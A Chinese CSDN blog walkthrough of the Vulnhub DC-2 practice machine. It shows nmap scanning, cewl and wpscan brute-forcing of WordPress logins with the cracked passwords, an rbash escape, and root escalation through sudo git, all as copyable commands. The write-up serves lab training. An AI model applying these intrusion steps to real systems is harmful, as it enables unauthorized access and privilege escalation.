渗透测试靶机:DC-2

最新推荐文章于 2024-05-12 22:49:40 发布
最新推荐文章于 2024-05-12 22:49:40 发布
阅读量86 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70830611/article/details/135055326
版权

一、开始渗透

1.1 获取一下靶机ip

nmap -sn 192.168.2.1/24

title

1.2 扫描靶机端口和服务

nmap -sV -sC -A -p- 192.168.2.196

title
目标计算机开放80端口、7744端口

1.3 漏洞利用

1.3.1 先去访问一下80端口的网页,看看有些什么

如果访问不了,可以去host文件那里修改一下本地解析

vim /etc/hosts

title
打开网页就能直接看到flag1
它提示我要用下cewl工具

1.3.2 flag2

cewl http://dc-2 -w passwd.txt

继续搜集点信息

whatweb http://dc-2
dirb http://dc-2

title
title
很明显有个wp-admin的登陆网页
title
了解到有一个专门针对wordpress的工具wpscan
得到了三个用户admin、jerry、tom

wpscan --url http://dc-2 --enumerate u  //枚举用户
wpscan --url http://dc-2 --passwords passwd.txt

title
先前cewl有生成字典,使用wpscan进行暴力破解
title
jerry和tom的密码成功爆了出来,对wp-admin进行下登陆
jerry / adipiscing
tom / parturient
用jerry登陆进去后直接就找到了flag2
title

1.3.3 flag3

还有个7744端口的ssh可以利用,尝试下这两个用户能否登陆进去
jerry没有成功,但tom可以

tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

不能用cat打开

compgen -c  //列出当前可执行命令 有个less
less flag3.txt

title

1.3.4 flag4

发现ls能列出home目录,然后还能直接用less查看flag4.txt

tom@DC-2:~$ ls /home
jerry  tom
tom@DC-2:~$ ls /home/jerry
flag4.txt
tom@DC-2:~$ less /home/jerry/flag4.txt

title

1.3.5

尝试绕过rbash(这里直接借鉴了别人的,但还是不太懂)

:set shell=/bin/sh
:shell
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*

find / -perm -u=s -type f 2>/dev/null

title

$ su jerry
Password:adipiscing 
jerry@DC-2:/tmp$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

git是以root权限执行的,git也照应了上一个flag的提示

sudo git help config
!/bin/bash

然后回来就变成了root
title
后面的步骤做的有些云里雾里的。

benben-xu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
渗透测试靶机
anquanzushiye的博客
03-20 1190
网站今日更新PPT内容:1.从刑事个案看信息保护与数据利用 https://www.secshi.com/34183.html2.网络空间治理的中国法治...
靶机渗透测试(HA: NARAK)
@小张小张的博客
10-24 2855
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets Earth_vulnhub earth
最新发布
2401_84715926的博客
05-12 262
【代码】看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets Earth_vulnhub earth。
靶机渗透测试(Pandavas)
@小张小张的博客
11-01 1098
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy) 目标:Get root! 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 得到靶机ip为:192.168.10.33 2. nmap进行靶机端口服务扫描 命令:nmap -sS -Pn -A -p-
对DriftingBlues-6靶机进行渗透测试
zll___的博客
04-20 574
对DriftingBlues-6靶机进行渗透测试
靶机渗透测试(cherry:1)
@小张小张的博客
10-26 1066
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate–Hard) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
渗透测试靶机---Tr0ll
久恙502的博客
10-28 334
渗透测试,打靶经历记录,大佬多多指点,谢谢!
靶机渗透测试(Sumo_Sun*)
@小张小张的博客
09-19 553
靶机渗透测试(Sumo_Sun*): Vulnhub靶机 Sumo_Sun* 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Beginner) 目标:成功渗透进入靶机,得到root shell ,提升至root权限! 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址:192.168.10.22 2. nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶
靶机简单渗透测试
KKK_2178的博客
11-22 5516
1.下载靶机Metasploitable2-Linux,下载地址:Metasploitable download | SourceForge.net 2.在虚拟机中打开Kali-Linux和下载好的Metasploitable2-Linux,Metasploitable2-Linux的账号:msfadmin,密码:msfadmin. 3.在靶机中输入指令ifconfig,得到靶机ip 4.返回Kali虚拟机操作 输入指令nmap xxxxx (xxxxx为你靶机的ip)查看靶机端口.
渗透测试DC-2靶机
Ciyaso的博客
08-16 208
一、扫描获取靶机ip 用nmap扫描192.168.203.0/24以获取靶机ip arp-scan -l 192.168.203.139 二、获取网站信息 1.nmap nmap -A -v -sS -sV -p- 192.168.203.139 开放了80端口、7744端口 2.Wappaloyzer web服务器:Apache 2.4.10 CMS:WordPress 数据库: Mysql JS库:jQuery 进入页面发现访问不了 查看发现直接访问80端口会跳转到http://dc
靶机渗透测试(covfefe)
@小张小张的博客
11-14 1639
靶机渗透测试(covfefe): Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址(netdiscover -i e
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2769
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机的网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
DC-3靶机渗透测试
读书 买花 长大
04-09 322
DC-3
VulnHub入门教程:DC-1靶场攻破指南
靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux 命令行以及基本的渗透测试工具使用经验,如 Kali Linux 或 Parrot Security OS 上的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值